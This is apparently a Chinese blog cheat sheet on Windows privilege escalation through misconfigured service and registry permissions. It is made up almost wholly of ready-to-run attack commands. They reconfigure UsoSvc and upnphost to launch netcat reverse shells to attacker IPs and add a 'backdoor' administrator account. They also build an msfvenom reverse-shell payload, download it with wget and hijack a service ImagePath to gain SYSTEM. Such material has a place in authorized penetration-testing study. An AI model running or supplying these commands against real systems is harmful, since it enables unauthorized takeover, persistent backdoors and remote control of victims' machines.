提权工具合集包: 夸克网盘分享
往期文章
WEB渗透Win提权篇-RDP&Firewall-CSDN博客
WEB渗透Win提权篇-AccountSpoofing-CSDN博客
服务中的不正确权限
CVE-2019-1322 UsoSvc
条件:服务帐号
PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
PS C:\Windows\system32> sc.exe start UsoSvc
upnphost
>sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
>sc config upnphost obj= ".\LocalSystem" password= ""
>sc qc upnphost
>sc config upnphost depend= ""
>net start upnphost
如果由于缺少依赖项而失败,请尝试以下命令。
>sc config SSDPSRV start=auto
>net start SSDPSRV
>net stop upnphost
>net start upnphost
>sc config upnphost depend=""
使用accesschk
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe
>accesschk.exe -uwcqv "Authenticated Users" * /accepteula
RW SSDPSRV
SERVICE_ALL_ACCESS
RW upnphost
SERVICE_ALL_ACCESS
>accesschk.exe -ucqv upnphost
upnphost
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
>sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
>sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
>sc stop <vuln-service>
>sc start <vuln-service>
>sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
>sc stop <vuln-service>
>sc start <vuln-service>
弱注册表权限
检查有KEY_ALL_ACCESS权限的注册表项
>accesschk.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services
查询路径
>reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xxxx
使用powershell查询
>Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\xxxx | fl
可以看到authenticated users ALLOW FullControl 攻击
>msfvenom –p window/shell_reverse_tcp lhost=192.168.1.3 lport=8888 –f exe > shell.exe
>python –m SimpleHTTPServer 80
>cd c:\Users\public
>powershell wget http://192.168.1.3/shell.exe -o shell.exe
>dir
>reg add "HKLM\system\currentcontrolset\services\xxxx" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Public\shell.exe" /f
>net start pentest
攻击机监听获得system权限会话
>nc -lvp 8888
弱权限的PATH目录
>for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
>for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
>sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
>FOR /F %i in (Servicenames.txt) DO echo %i
>type Servicenames.txt
>FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
>FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
或使用msf模块exploit/windows/local/service_permissions 寻找BUILTIN\Users:(F)(完全访问)、BUILTIN\Users:(M)(修改访问)或 BUILTIN\Users:(W)(只写访问)